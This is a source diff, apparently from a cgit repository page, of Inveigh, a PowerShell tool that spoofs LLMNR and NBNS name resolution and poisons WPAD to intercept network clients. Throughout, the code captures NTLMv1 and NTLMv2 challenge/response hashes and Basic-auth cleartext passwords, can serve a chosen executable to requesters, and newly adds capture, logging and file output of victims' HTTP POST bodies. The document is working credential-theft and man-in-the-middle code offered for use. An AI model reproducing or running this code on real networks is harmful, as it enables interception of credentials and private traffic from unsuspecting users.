+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")])
- if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$user_agent.contains($_)}))
+ if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)}))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
@@ -1537,18 +1584,44 @@ $HTTP_scriptblock =
}
- if($authentication_header.startswith('NTLM '))
+ if($TCP_request -like "50-4f-53-54*")
+ {
+ $HTTP_POST_request_extract = $TCP_request.Substring($TCP_request.IndexOf("-0D-0A-0D-0A-") + 12)
+ $HTTP_POST_request_extract = $HTTP_POST_request_extract.Substring(0,$HTTP_POST_request_extract.IndexOf("-00-"))
+ $HTTP_POST_request_extract = $HTTP_POST_request_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_POST_request = New-Object System.String ($HTTP_POST_request_extract,0,$HTTP_POST_request_extract.Length)
+
+ if($HTTP_POST_request_old -ne $HTTP_POST_request)
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP")
+ $inveigh.POST_request_file_queue.Add($HTTP_POST_request)
+ $inveigh.POST_request_list.Add($HTTP_POST_request)
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")])
+
+ if($inveigh.file_output)
+ {
+ $inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file)
+ }
+
+ }
+
+ $HTTP_POST_request_old = $HTTP_POST_request
+ }
+
+ if($HTTP_header_authorization.StartsWith('NTLM '))
{
- $authentication_header = $authentication_header -replace 'NTLM ',''
- [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+ $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
+ [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
if($proxy_listener)
{
$HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
else
{
$HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
@@ -1596,7 +1669,7 @@ $HTTP_scriptblock =
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
@@ -1630,7 +1703,7 @@ $HTTP_scriptblock =
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+ $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
@@ -1665,7 +1738,16 @@ $HTTP_scriptblock =
if($proxy_listener)
{
- $HTTP_client.Client.Close()
+
+ if($HTTPResponse -or $HTTPDir)
+ {
+ $HTTP_header_cache_control = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x6e,0x6f,0x2d,0x63,0x61,0x63,0x68,0x65,0x2c,0x20,0x6e,0x6f,0x2d,0x73,0x74,0x6f,0x72,0x65
+ }
+ else
+ {
+ $HTTP_client.Client.Close()
+ }
+
}
}
@@ -1676,12 +1758,12 @@ $HTTP_scriptblock =
}
}
- elseif($authentication_header.startswith('Basic '))
+ elseif($HTTP_header_authorization.startswith('Basic '))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
- $authentication_header = $authentication_header -replace 'Basic ',''
- $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
+ $HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ',''
+ $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization))
$HTTP_client_close = $true
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")])
$inveigh.cleartext_file_queue.Add($cleartext_credentials)
@@ -1696,6 +1778,7 @@ $HTTP_scriptblock =
}
else
{
+
if($HTTPAuth -ne 'Anonymous' -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -ne 'Anonymous'))
{
$HTTP_client_close = $false
@@ -1707,13 +1790,13 @@ $HTTP_scriptblock =
}
- if(($HTTPAuth -eq 'Anonymous' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $HTTP_request_raw_url -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth -and !$proxy_listener)
+ if(($HTTPAuth -eq 'Anonymous' -and $HTTP_request_raw_url -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $HTTP_request_raw_url -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth)
{
if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)))
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE))
- $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/exe") + 0x0d,0x0a
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/exe")
}
elseif($HTTPDir)
{
@@ -1722,14 +1805,14 @@ $HTTP_scriptblock =
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
- elseif($HTTPDefaultFile -and $HTTP_request_raw_url -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
+ elseif($HTTPDefaultFile -and $HTTP_request_raw_url -eq '' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
elseif($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat')
{
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse)
- $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
}
else
{
@@ -1749,26 +1832,21 @@ $HTTP_scriptblock =
else
{
- if($HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$user_agent.contains($_)})))
+ if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})))
{
$HTTP_message = $WPADResponse
- $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
}
elseif($HTTPResponse)
{
$HTTP_message = $HTTPResponse
-
+
if($HTTPContentType)
{
- $HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTPContentType) + 0x0d,0x0a
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTPContentType)
}
}
- else
- {
- $HTTP_message = ""
- $HTTP_content_type_header = $null
- }
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
}
@@ -1776,81 +1854,51 @@ $HTTP_scriptblock =
}
else
{
- $HTTP_message = ""
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
- $HTTP_content_type_header = $null
}
$HTTP_timestamp = Get-Date -format r
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
- $HTTP_content_length_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message_bytes.Length)
- $HTTP_content_headers = $HTTP_content_type_header + $HTTP_content_length_header
+ $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message_bytes.Length)
if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
{
- $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
-
- $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
- $HTTP_response_status_code +
- 0x20 +
- $HTTP_response_phrase +
- 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
- 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
- 0x0a,0x44,0x61,0x74,0x65,0x3a +
- $HTTP_timestamp +
- 0x0d,0x0a +
- $HTTP_WWW_authenticate_header +
- $NTLM +
- 0x0d,0x0a +
- $HTTP_content_headers +
- 0x0d,0x0a +
- 0x0d,0x0a +
- $HTTP_message_bytes
-
+ $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
}
elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat'))
{
- $Basic = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm")
- $HTTP_content_headers = $HTTP_content_type_header + $HTTP_content_length_header
-
- $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
- $HTTP_response_status_code +
- 0x20 +
- $HTTP_response_phrase +
- 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
- 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
- 0x0a,0x44,0x61,0x74,0x65,0x3a +
- $HTTP_timestamp +
- 0x0d,0x0a +
- $HTTP_WWW_authenticate_header +
- $Basic +
- 0x0d,0x0a +
- $HTTP_content_headers +
- 0x0d,0x0a +
- 0x0d,0x0a +
- $HTTP_message_bytes
-
+ $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm")
}
else
{
$HTTP_response_status_code = 0x32,0x30,0x30
- $HTTP_response_phrase = 0x4f,0x4b
+ }
+
+ $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
+ $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
+ $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
- $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
- $HTTP_response_status_code +
- 0x20 +
- $HTTP_response_phrase +
- 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
- 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
- 0x0a,0x44,0x61,0x74,0x65,0x3a +
- $HTTP_timestamp +
- 0x0d,0x0a +
- $HTTP_content_headers +
- 0x0d,0x0a +
- 0x0d,0x0a +
- $HTTP_message_bytes
+ if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
}
+ if($HTTP_header_content_type)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
+ }
+
+ if($HTTP_header_cache_control)
+ {
+ $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
+ }
+
+ $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
+ $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
$HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
$HTTP_stream.Flush()
Start-Sleep -m 10
@@ -1859,7 +1907,16 @@ $HTTP_scriptblock =
if($HTTP_client_close)
{
- $HTTP_client.Close()
+
+ if($proxy_listener)
+ {
+ $HTTP_client.Client.Close()
+ }
+ else
+ {
+ $HTTP_client.Close()
+ }
+
}
}
@@ -1883,7 +1940,8 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL)
+ param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,
+ $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL)
$sniffer_running = $true
$byte_in = New-Object System.Byte[] 4
@@ -1930,18 +1988,15 @@ $sniffer_scriptblock =
$memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data)
$binary_reader = New-Object System.IO.BinaryReader($memory_stream)
$version_HL = $binary_reader.ReadByte()
- $type_of_service= $binary_reader.ReadByte()
+ $binary_reader.ReadByte()
$total_length = DataToUInt16 $binary_reader.ReadBytes(2)
- $identification = $binary_reader.ReadBytes(2)
- $flags_offset = $binary_reader.ReadBytes(2)
- $TTL = $binary_reader.ReadByte()
+ $binary_reader.ReadBytes(5)
$protocol_number = $binary_reader.ReadByte()
- $header_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
+ $binary_reader.ReadBytes(2)
$source_IP_bytes = $binary_reader.ReadBytes(4)
$source_IP = [System.Net.IPAddress]$source_IP_bytes
$destination_IP_bytes = $binary_reader.ReadBytes(4)
$destination_IP = [System.Net.IPAddress]$destination_IP_bytes
- $IP_version = [Int]"0x$(('{0:X}' -f $version_HL)[0])"
$header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4
switch($protocol_number)
@@ -1951,13 +2006,9 @@ $sniffer_scriptblock =
{ # TCP
$source_port = DataToUInt16 $binary_reader.ReadBytes(2)
$destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
- $sequence_number = DataToUInt32 $binary_reader.ReadBytes(4)
- $ack_number = DataToUInt32 $binary_reader.ReadBytes(12)
+ $binary_reader.ReadBytes(16)
$TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
- $TCP_flags = $binary_reader.ReadByte()
- $TCP_window = DataToUInt16 $binary_reader.ReadBytes(2)
- $TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
- $TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2)
+ $binary_reader.ReadByte(7)
$payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length))
switch ($destination_port)
@@ -2895,7 +2946,8 @@ $control_scriptblock =
}
}
-
+
+ Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message") > $null
Start-Sleep -S 1
@@ -2908,6 +2960,7 @@ $control_scriptblock =
if($inveigh.relay_running)
{
+ Start-Sleep -S 1
$inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
$inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message") > $null
Start-Sleep -S 1
@@ -3004,6 +3057,12 @@ $control_scriptblock =
$inveigh.cleartext_file_queue.RemoveAt(0)
}
+ while($inveigh.POST_request_file_queue.Count -gt 0)
+ {
+ $inveigh.POST_request_file_queue[0]|Out-File $inveigh.POST_request_out_file -Append
+ $inveigh.POST_request_file_queue.RemoveAt(0)
+ }
+
}
Start-Sleep -m 5
@@ -3166,12 +3225,13 @@ if($HTTP -eq 'Y')
HTTPListener
}
-# HTTP Server Start
+# HTTPS Server Start
if($HTTPS -eq 'Y')
{
HTTPSListener
}
+# Proxy Server Start
if($Proxy -eq 'Y')
{
ProxyListener
@@ -3223,55 +3283,46 @@ if($inveigh.console_output)
while($inveigh.console_queue.Count -gt 0)
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
+ switch -wildcard ($inveigh.console_queue[0])
{
- switch -wildcard ($inveigh.console_queue[0])
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
+ Write-Warning ($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
- "* written to *"
- {
-
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
+ {
- "* for relay *"
+ if($ConsoleOutput -eq 'Y')
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
}
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ $inveigh.console_queue.RemoveAt(0)
- "* local administrator *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- default
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
{
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
}
+ $inveigh.console_queue.RemoveAt(0)
+
}
- }
+ default
+ {
+ Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
}
@@ -3299,6 +3350,24 @@ if($inveigh.console_output)
{
Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
}
+
+ if($inveigh.POST_request_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline)
+ $inveigh.POST_request_list.Sort()
+
+ foreach($unique_POST_request in $inveigh.POST_request_list)
+ {
+ if($unique_POST_request -ne $unique_POST_request_last)
+ {
+ Write-Output($unique_POST_request + $inveigh.newline)
+ }
+
+ $unique_POST_request_last = $unique_POST_request
+ }
+
+ Start-Sleep -m 5
+ }
if($inveigh.NTLMv1_list.Count -gt 0)
{
@@ -3477,11 +3546,20 @@ function Get-Inveigh
Get-Inveigh will get stored Inveigh data from memory.
.PARAMETER Console
-Get queued console output. This is also the default if no parameters are set.
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
.PARAMETER Log
Get log entries.
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
.PARAMETER NTLMv1
Get captured NTLMv1 challenge/response hashes.
@@ -3500,20 +3578,20 @@ Get the first captured NTLMv2 challenge/response for each unique account.
.PARAMETER NTLMv2Usernames
Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
-.PARAMETER Cleartext
-Get captured cleartext credentials.
+.PARAMETER POSTRequest
+Get captured POST requests.
-.PARAMETER CleartextUnique
-Get unique captured cleartext credentials.
-
-.PARAMETER Learning
-Get valid hosts discovered through spoofer learning.
+.PARAMETER POSTRequestUnique
+Get unique captured POST request.
#>
[CmdletBinding()]
param
(
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
[parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$Learning,
[parameter(Mandatory=$false)][Switch]$Log,
[parameter(Mandatory=$false)][Switch]$NTLMv1,
[parameter(Mandatory=$false)][Switch]$NTLMv2,
@@ -3521,9 +3599,8 @@ param
[parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
[parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
[parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
- [parameter(Mandatory=$false)][Switch]$Cleartext,
- [parameter(Mandatory=$false)][Switch]$CleartextUnique,
- [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -3544,30 +3621,7 @@ if($Console -or $PSBoundParameters.Count -eq 0)
switch -wildcard ($inveigh.console_queue[0])
{
- "* written to *"
- {
-
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* for relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* local administrator *"
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
@@ -3658,6 +3712,16 @@ if($CleartextUnique)
Write-Output $inveigh.cleartext_list | Get-Unique
}
+if($POSTRequest)
+{
+ Write-Output $inveigh.POST_request_list
+}
+
+if($POSTRequestUnique)
+{
+ Write-Output $inveigh.POST_request_list | Get-Unique
+}
+
if($Learning)
{
Write-Output $inveigh.valid_host_list
@@ -3670,8 +3734,18 @@ function Watch-Inveigh
<#
.SYNOPSIS
Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleOutput
+(Medium,Low) Medium and Low can be used to reduce output.
#>
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
if($inveigh.tool -ne 1)
{
@@ -3683,60 +3757,51 @@ if($inveigh.tool -ne 1)
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- while($inveigh.console_queue.Count -gt 0)
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
{
- if($inveigh.output_stream_only)
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
}
- else
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
{
- switch -wildcard ($inveigh.console_queue[0])
+ if($ConsoleOutput -eq 'Y')
{
-
- "* written to *"
- {
+ Write-Output $inveigh.console_queue[0]
+ }
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
+ $inveigh.console_queue.RemoveAt(0)
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- "* for relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ $inveigh.console_queue.RemoveAt(0)
- "* local administrator *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
- }
+ }
- }
-
- }
+ }
if([Console]::KeyAvailable)
{
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-25 19:49:29 +0000